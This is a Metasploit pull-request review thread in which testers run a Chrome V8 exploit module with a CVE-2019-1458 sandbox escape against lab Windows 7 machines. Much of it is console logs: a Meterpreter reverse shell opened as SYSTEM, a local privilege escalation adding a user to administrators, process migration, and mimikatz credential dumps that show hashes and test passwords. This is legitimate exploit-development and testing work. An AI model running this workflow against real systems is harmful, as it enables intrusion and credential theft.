C:\Users\low\Desktop>net localgroup administrators admin /add
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>net localgroup administrators low /add
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>cve-2019-1458.exe "net localgroup administrators low /add"
CVE-2019-1458 exploit by @unamer(https://github.com/unamer)
[*] tagWND: 0xFFFFF90140823A70, tagCLS:0xFFFFF901408209C0, gap:0x30b0
[*] Registering window
[*] Creating instance of this window
[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window 0x0000000000040066
[*] Calling SetWindowLongPtr to set window extra data, that will be later derefe
renced
[*] GetLastError = 0
[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0
x130
[*] Simulating alt key press
[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second
 time
[*] tagWND: 0xFFFFF9014081A370
[+] Exploit success!
[*] Trying to execute net localgroup administrators low /add as SYSTEM
[+] ProcessCreated with pid 2388!
===============================
The command completed successfully.



C:\Users\low\Desktop>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the compu
ter/domain

Members

-------------------------------------------------------------------------------
Administrator
low
user
The command completed successfully.


C:\Users\low\Desktop>
```

This shows that this succeeds in adding the `low` user to the administrators group (before `low` was just a normal user).

2020-09-08 17:10 UTC, timwr commented
Apologies but I implemented this change: https://github.com/rapid7/metasploit-framework/pull/13817/commits/e9ef1bb4b286d13f8baff780ee71ca35a3832141 without updating the instructions.
@gwillcox-r7 did you test with `set target 1` or the default?

2020-09-08 17:40 UTC, gwillcox-r7 commented
@timwr I think I probably tried the default options. I used the testing instructions so most likely I didn't use the `set target 1` option. Sorry! I'll try retest this again with that option.

2020-09-08 18:59 UTC, gwillcox-r7 commented
@timwr Ok with the new option where I set the sandbox escape mode on, it seems to work:

```
msf5 exploit(multi/browser/chrome_object_create) > show options

Module options (exploit/multi/browser/chrome_object_create):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   SRVHOST   169.254.115.5    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH   /                no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     169.254.115.5    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows 7 (x64) sandbox escape via CVE-2019-1458


msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 169.254.115.5:4444
[-] Exploit failed: Errno::EACCES Permission denied - bind(2) for 169.254.115.5:8080
msf5 exploit(multi/browser/chrome_object_create) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 169.254.115.5:4444
[-] Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:8080
msf5 exploit(multi/browser/chrome_object_create) > set SRVPORT 9922
SRVPORT => 9922
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 169.254.115.5:4444
[*] Using URL: http://0.0.0.0:9922/
[*] Local IP: http://192.168.1.129:9922/
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > jobs -K
Stopping all jobs...
[*] Server stopped.
msf5 exploit(multi/browser/chrome_object_create) > set SRVHOST 169.254.115.5
SRVHOST => 169.254.115.5
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 169.254.115.5:4444
[*] Using URL: http://169.254.115.5:9922/
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p6 and p25 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x1f7aec9eec8
[*] 169.254.133.29   chrome_object_create - Sending /payload to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[+] 169.254.133.29   chrome_object_create - Sent stage2 exploit (20000 bytes)
[*] 169.254.133.29   chrome_object_create - [*] payload addr: 0x60a9241c000
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x76700474760
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x66ad3a0000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x33690050d70
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x54c191a31f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
[*] Sending stage (201283 bytes) to 169.254.133.29
[*] Meterpreter session 1 opened (169.254.115.5:4444 -> 169.254.133.29:49159) at 2020-09-08 13:54:22 -0500

msf5 exploit(multi/browser/chrome_object_create) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
test      test-PC  01fc5a6be7bc6929aad3b435b51404ee  0cb6948805f797bf2a82807973b89537  87f8ed9157125ffc4da9e06a7b8011ad80a53fe1

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
TEST-PC$  WORKGROUP  (null)
test      test-PC    test

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
test      test-PC  test

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
test      test-PC    test
test-pc$  WORKGROUP  (null)


meterpreter >
```

If you close the exploit tab or click on the close page button after the warning pops up about a nonresponsive page, the session will close:

```
kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
test      test-PC    test
test-pc$  WORKGROUP  (null)

*close Chrome after this output is printed out*
meterpreter >
[*] 169.254.133.29 - Meterpreter session 1 closed.  Reason: Died
```

So looks like it might be a good idea to add some form of migration here, though at the very least the exploit works. I can also confirm that you get a BSOD when attempting to reboot the PC.

2020-09-08 19:10 UTC, gwillcox-r7 commented
Okay so far worked 3/3 times I tried, so this is definitely reliable to trigger, though it seems like the issue is the session closing when the Chrome tab crashes or is closed, and the BSOD of death when the target shuts down or reboots. Otherwise this is a very nice module, nice work @timwr 👍 

Oh and some proof that migrating works well:
```
 2716  2320  chrome.exe                x64   1        test-PC\test                  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 2904  596   SearchIndexer.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchIndexer.exe
 2972  2904  SearchProtocolHost.exe    x64   1        test-PC\test                  C:\Windows\system32\SearchProtocolHost.exe
 2992  2904  SearchFilterHost.exe      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchFilterHost.exe
 3032  2904  SearchProtocolHost.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchProtocolHost.exe

meterpreter > migrate 2904
[*] Migrating from 1816 to 2904...
[*] Migration completed successfully.
*close the Chrome tab*
meterpreter > get
get_timeouts  getenv        getpid        getproxy      getsystem     getwd
getdesktop    getlwd        getprivs      getsid        getuid
meterpreter > getpid
Current pid: 2904
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
test      test-PC  01fc5a6be7bc6929aad3b435b51404ee  0cb6948805f797bf2a82807973b89537  87f8ed9157125ffc4da9e06a7b8011ad80a53fe1

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
TEST-PC$  WORKGROUP  (null)
test      test-PC    test

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
test      test-PC  test

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
test      test-PC    test
test-pc$  WORKGROUP  (null)


meterpreter >
```
So no crash on Chrome closing if we migrate and functionality seems to work fine after migrating without crashing anything.

2020-09-08 19:51 UTC, gwillcox-r7 commented
Okay so I did find a solution to the migration issue, which is to simply migrate to the `SearchIndexer.exe` process, which we can do with the command `migrate -n SearchIndexer.exe`. This will ensure we still retain our SYSTEM permissions, as normal `migrate` will just attempt to migrate to any process that is available which could result in us loosing the privileges we worked so hard to gain.

I also did try using `PrependMigrate` but unfortunately had no luck with that. Whilst it didn't hinder the exploit, it didn't help it either. It just kinda did....well...nothing? It didn't cause us to change PID and it didn't stop the exploit from working either.

Anyway without further ado, here is what I did try that seems to work, though it does through a deprecation warning:

```
msf5 exploit(multi/browser/chrome_object_create) > set InitialAutoRunScript 'migrate -n SearchIndexer.exe'
InitialAutoRunScript => migrate -n SearchIndexer.exe
msf5 exploit(multi/browser/chrome_object_create) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf5 exploit(multi/browser/chrome_object_create) > reload
[*] Reloading module...
msf5 exploit(multi/browser/chrome_object_create) > exploit
[*] Exploit running as background job 9.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 169.254.115.5:4444
[*] Using URL: http://169.254.115.5:9922/
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 169.254.133.29 - Meterpreter session 6 closed.  Reason: Died
[*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p6 and p22 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x49830c9eb18
[*] 169.254.133.29   chrome_object_create - Sending /payload to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[+] 169.254.133.29   chrome_object_create - Sent stage2 exploit (20000 bytes)
[*] 169.254.133.29   chrome_object_create - [*] payload addr: 0x758f221c000
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x2ffd9037ae0
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x1cf9f010000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x7c150b65d90
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x17dcde31f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
[*] Sending stage (201283 bytes) to 169.254.133.29
[*] Meterpreter session 7 opened (169.254.115.5:4444 -> 169.254.133.29:49159) at 2020-09-08 14:45:37 -0500
[*] Session ID 7 (169.254.115.5:4444 -> 169.254.133.29:49159) processing InitialAutoRunScript 'migrate -n SearchIndexer.exe'
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
[*] Current server process: chrome.exe (2756)
[+] Migrating to 2504
[+] Successfully migrated to process

msf5 exploit(multi/browser/chrome_object_create) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  7         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ TEST-PC  169.254.115.5:4444 -> 169.254.133.29:49159 (169.254.133.29)

msf5 exploit(multi/browser/chrome_object_create) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 2504
meterpreter > ps

Process List
============

 PID   PPID  Name                      Arch  Session  User                          Path
 ---   ----  ----                      ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                    x64   0
 352   4     smss.exe                  x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 436   428   csrss.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 484   428   wininit.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 496   476   csrss.exe                 x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 548   476   winlogon.exe              x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 592   484   services.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 604   484   lsass.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 612   484   lsm.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 716   592   svchost.exe               x64   0        NT AUTHORITY\SYSTEM
 780   592   svchost.exe               x64   0        NT AUTHORITY\LOCAL SERVICE
 784   592   svchost.exe               x64   0        NT AUTHORITY\NETWORK SERVICE
 840   592   svchost.exe               x64   0        NT AUTHORITY\LOCAL SERVICE
 932   980   dwm.exe                   x64   1        test-PC\test                  C:\Windows\system32\Dwm.exe
 936   1512  chrome.exe                x64   1        test-PC\test                  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 968   1144  explorer.exe              x64   1        test-PC\test                  C:\Windows\Explorer.EXE
 980   592   svchost.exe               x64   0        NT AUTHORITY\SYSTEM
 1020  592   svchost.exe               x64   0        NT AUTHORITY\SYSTEM
 1064  592   svchost.exe               x64   0        NT AUTHORITY\NETWORK SERVICE
 1172  592   spoolsv.exe               x64   0        NT AUTHORITY\SYSTEM
 1208  592   svchost.exe               x64   0        NT AUTHORITY\LOCAL SERVICE
 1280  592   vmicsvc.exe               x64   0        NT AUTHORITY\NETWORK SERVICE
 1300  592   vmicsvc.exe               x64   0        NT AUTHORITY\LOCAL SERVICE
 1332  592   vmicsvc.exe               x64   0        NT AUTHORITY\SYSTEM
 1368  592   vmicsvc.exe               x64   0        NT AUTHORITY\LOCAL SERVICE
 1400  592   vmicsvc.exe               x64   0        NT AUTHORITY\SYSTEM
 1432  1512  chrome.exe                x64   1        test-PC\test                  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 1512  968   chrome.exe                x64   1        test-PC\test                  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 1816  1856  GoogleUpdate.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 1828  1856  GoogleCrashHandler.exe    x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler.exe
 1856  1988  GoogleUpdate.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 1864  1856  GoogleCrashHandler64.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler64.exe
 1920  592   taskhost.exe              x64   1        test-PC\test                  C:\Windows\system32\taskhost.exe
 1988  1020  taskeng.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\taskeng.exe
 2008  592   sppsvc.exe                x64   0        NT AUTHORITY\NETWORK SERVICE
 2068  592   svchost.exe               x64   0        NT AUTHORITY\LOCAL SERVICE
 2360  1512  chrome.exe                x64   1        test-PC\test                  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 2408  1512  chrome.exe                x64   1        test-PC\test                  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 2504  592   SearchIndexer.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\syst [...]

2020-09-23 18:48 UTC, gwillcox-r7 commented
@timwr Any updates on how you'd like to proceed with this PR? I think the last comments should help out with some of the migration issue, not sure if its a perfect solution though.

2020-09-24 10:08 UTC, timwr commented
Apologies for the delay.
So I tried PrependMigrate but I was seeing the same thing, it doesn't appear to do anything. I added `'DefaultOptions'  => { 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' }` for the sandbox escape which appears to work, and it seems most of the existing windows browser exploits already have this option set.

2020-09-24 14:31 UTC, gwillcox-r7 commented
> Apologies for the delay.
> So I tried PrependMigrate but I was seeing the same thing, it doesn't appear to do anything. I added `'DefaultOptions' => { 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' }` for the sandbox escape which appears to work, and it seems most of the existing windows browser exploits already have this option set.

Awesome thanks I think that is actually the proper way to do things so I'll get going on testing this again and confirming if that works or not. Also see you made a couple of RuboCop related changes; much appreciated!

2020-09-24 15:53 UTC, gwillcox-r7 commented
So looks like the new strategy of using the `post/windows/manage/priv_migrate` strategy works flawlessly 🥳 Here are the results:

```
msf5 > use exploit/multi/browser/chrome_object_create
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_object_create) > show options

Module options (exploit/multi/browser/chrome_object_create):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.31.203.74    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   No sandbox escape (--no-sandbox)


msf5 exploit(multi/browser/chrome_object_create) > set LHOST 172.31.203.74
LHOST => 172.31.203.74
msf5 exploit(multi/browser/chrome_object_create) > set target 1
target => 1
msf5 exploit(multi/browser/chrome_object_create) > set URIPATH /
URIPATH => /
msf5 exploit(multi/browser/chrome_object_create) > set SRVHOST 172.31.203.74
SRVHOST => 172.31.203.74
msf5 exploit(multi/browser/chrome_object_create) > set DEBUG_EXPLOIT true
DEBUG_EXPLOIT => true
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/browser/chrome_object_create) > 
[*] Started reverse TCP handler on 172.31.203.74:4444 
[*] Using URL: http://172.31.203.74:8080/
[*] Server started.
[*] 172.31.192.144   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 172.31.192.144   chrome_object_create - [*] Properties p9 and p5 overlap after conversion to dictionary mode
[*] 172.31.192.144   chrome_object_create - [*] ArrayBuffer @ 0x1b764b1efc8
[*] 172.31.192.144   chrome_object_create - Sending /payload to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[+] 172.31.192.144   chrome_object_create - Sent stage2 exploit (20000 bytes)
[*] 172.31.192.144   chrome_object_create - [*] payload addr: 0x13ca541c000
[*] 172.31.192.144   chrome_object_create - [*] wasm_addr @ 0x6e78f874788
[*] 172.31.192.144   chrome_object_create - [*] wasm_rwx @ 0x73cc8050000
[*] 172.31.192.144   chrome_object_create - [*] div_addr @ 0x4ae9b051b00
[*] 172.31.192.144   chrome_object_create - [*] el_addr @ 0x5d9d83831f8
[*] 172.31.192.144   chrome_object_create - [*] Triggering...
[*] Sending stage (201283 bytes) to 172.31.192.144
[*] Meterpreter session 1 opened (172.31.203.74:4444 -> 172.31.192.144:49179) at 2020-09-24 10:35:48 -0500
[*] Session ID 1 (172.31.203.74:4444 -> 172.31.192.144:49179) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is chrome.exe (1896) as: NT AUTHORITY\SYSTEM
[*] Session is already Admin and System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (592)
[+] Successfully migrated to services.exe (592) as: NT AUTHORITY\SYSTEM

msf5 exploit(multi/browser/chrome_object_create) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ TEST-PC  172.31.203.74:4444 -> 172.31.192.144:49179 (172.31.192.144)

msf5 exploit(multi/browser/chrome_object_create) > 
```

With this in mind I think there are a few things that still need to be done:

1. Decide if Windows 8 support is still going to be needed (saw some references to Windows 8 in the `check` method), and update the code with support for Windows 8 if needs be.
1. Rebase this module against `upstream/master` to make sure that none of the recent changes break anything.
1. Check the files in this module. Some of them such as the README.md file of the original source code might need some adjustments if this module is only going to be targeting Windows 7, and its possible we may need to remove excess code.
1. Update the module description to include the warning about this module only being possible to trigger once. (Although we do note this in the reliability section, having this in the documentation and module description would be nice; even just a short one liner will make a massive difference).

That's just my notes from a quick skim through the code. Hopefully that helps 👍

2020-10-06 22:11 UTC, gwillcox-r7 commented
@timwr https://github.com/rapid7/metasploit-framework/pull/13817/commits/a327aea771fb8f382fdb52f82755ab493ccac9a3 should now make this pretty much ready to land. The commit just makes it so that one of the Rapid7 team members have compiled the DLL in this exploit (sorry but I'm told we have to do this, even if its another Rapid7 team member's contribution).

Anyway here is the output after https://github.com/rapid7/metasploit-framework/pull/13817/commits/a327aea771fb8f382fdb52f82755ab493ccac9a3 is applied to show its still working:

```
msf6 > use exploit/multi/browser/chrome_object_create 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/browser/chrome_object_create) > set target 1
target => 1
msf6 exploit(multi/browser/chrome_object_create) > set URIPATH /
URIPATH => /
msf6 exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/browser/chrome_object_create) > set LHOST 172.22.188.58
LHOST => 172.22.188.58
msf6 exploit(multi/browser/chrome_object_create) > set SRVHOST 172.22.188.58
SRVHOST => 172.22.188.58
msf6 exploit(multi/browser/chrome_object_create) > set DEBUG_EXPLOIT true
DEBUG_EXPLOIT => true
msf6 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/browser/chrome_object_create) > 
[*] Started reverse TCP handler on 172.22.188.58:4444 
[*] Using URL: http://172.22.188.58:8080/
[*] Server started.
[*] 172.22.180.148   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 172.22.180.148   chrome_object_create - [*] Properties p9 and p8 overlap after conversion to dictionary mode
[*] 172.22.180.148   chrome_object_create - [*] ArrayBuffer @ 0x2209039efc8
[*] 172.22.180.148   chrome_object_create - Sending /payload to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[+] 172.22.180.148   chrome_object_create - Sent stage2 exploit (20000 bytes)
[*] 172.22.180.148   chrome_object_create - [*] payload addr: 0x6e83be1c000
[*] 172.22.180.148   chrome_object_create - [*] wasm_addr @ 0x4d6c4e740a8
[*] 172.22.180.148   chrome_object_create - [*] wasm_rwx @ 0x54ee07d0000
[*] 172.22.180.148   chrome_object_create - [*] div_addr @ 0x6c03efe1938
[*] 172.22.180.148   chrome_object_create - [*] el_addr @ 0xcc408231f8
[*] 172.22.180.148   chrome_object_create - [*] Triggering...
[*] Sending stage (200262 bytes) to 172.22.180.148
[*] Meterpreter session 1 opened (172.22.188.58:4444 -> 172.22.180.148:49192) at 2020-10-06 17:01:09 -0500
[*] Session ID 1 (172.22.188.58:4444 -> 172.22.180.148:49192) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is chrome.exe (2072) as: NT AUTHORITY\SYSTEM
[*] Session is already Admin and System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (592)
[+] Successfully migrated to services.exe (592) as: NT AUTHORITY\SYSTEM

msf6 exploit(multi/browser/chrome_object_create) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ TEST-PC  172.22.188.58:4444 -> 172.22.180.148:49192 (172.22.180.148)

msf6 exploit(multi/browser/chrome_object_create) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
test      test-PC  01fc5a6be7bc6929aad3b435b51404ee  0cb6948805f797bf2a82807973b89537  87f8ed9157125ffc4da9e06a7b8011ad80a53fe1

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
TEST-PC$  WORKGROUP  (null)
test      test-PC    test

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
test      test-PC  test

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
test      test-PC    test
test-pc$  WORKGROUP  (null)


meterpreter > 
```

2020-10-06 22:23 UTC, gwillcox-r7 commented
@timwr There are still a couple of linting issues related to stuff like `shellcode_size_offset` being assigned a value but not being used anywhere. Mind just double checking the code again and fixing these issues?

2020-10-07 21:01 UTC, gwillcox-r7 requested changes
Overall looks pretty good, but did have a few questions and comments on the module. Apologies in advance if I misunderstood anything, this was my attempt at a complete review to prune out any potential odd behavior.

2020-10-09 14:17 UTC, gwillcox-r7 commented
@timwr Going to work on making the changes necessary to fix up the rest of these issues today, so if you see any commits to your branch this is what they are related to.

2020-10-09 20:30 UTC, gwillcox-r7 commented on modules/exploits/windows/local/ntusermessagecall.rb
> +    elsif sysinfo_value =~ /8/ && build_num == 9600
Also now that I look it again, this module also affects Windows 10 systems according to https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458. So the `check` method should really also be checking for them as well.

2020-10-09 20:48 UTC, gwillcox-r7 commented on modules/exploits/windows/local/ntusermessagecall.rb
> +    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
Nm ignore this, I thought this was trying to regex on a different value than I expected.

That being said it is probably better to get the build number rather than trying to retrieve values like this, particularly given that Windows Server versions after Windows Server 2016 will currently return as `Windows Server 2016+` within Metasploit's `sysinfo` output.

2020-10-09 20:50 UTC, gwillcox-r7 commented on modules/exploits/windows/local/ntusermessagecall.rb
> +      # stdapi_sys_process_execute: Operation failed: Access is denied.
Nm I see this is a mistake as this is a separate module not tied into the Chrome exploit and it could be used in a wider variety of situations. Makes sense to keep this in here.

2020-10-09 20:52 UTC, gwillcox-r7 commented on modules/exploits/multi/browser/chrome_object_create.rb
> +          throw null;
@timwr I'm going to leave this for now. Whilst I still think it is something to consider, its not the focus of this PR and we can fix this as part of a separate PR if needs be.

2020-10-09 20:53 UTC, gwillcox-r7 commented on modules/exploits/multi/browser/chrome_object_create.rb
> +          let o = {inline: 42}      // TODO
I'm leaving this here for now. @timwr If you have any insights into this feel free to comment, but as I'm not sure if this is a reminder for yourself, I'm going to leave this as is for now.

2020-10-09 20:54 UTC, gwillcox-r7 commented on modules/exploits/multi/browser/chrome_object_create.rb
> +        loader_data += "\0" * (0x20000 - loader_data.length)
Going to leave this as is for now since this isn't the focus of this PR. @timwr if you do know if this could be randomized, I'd be interested to know.

2020-10-09 20:55 UTC, gwillcox-r7 commented on modules/exploits/multi/browser/chrome_object_create.rb
> +        'Platform' => ['windows', 'osx'],
Going to leave this as is for now. @timwr Ideally I think we should also be accounting for other platforms such as Android and the range of Linux systems that could also be affected by this bug, so I'd be interested to know if there is a reason you limited this module to just `windows` and `osx` but its not crucial to us merging this in for now, as the focus is more on Windows here, which has been listed in the platforms.

2020-10-10 01:29 UTC, gwillcox-r7 approved these changes

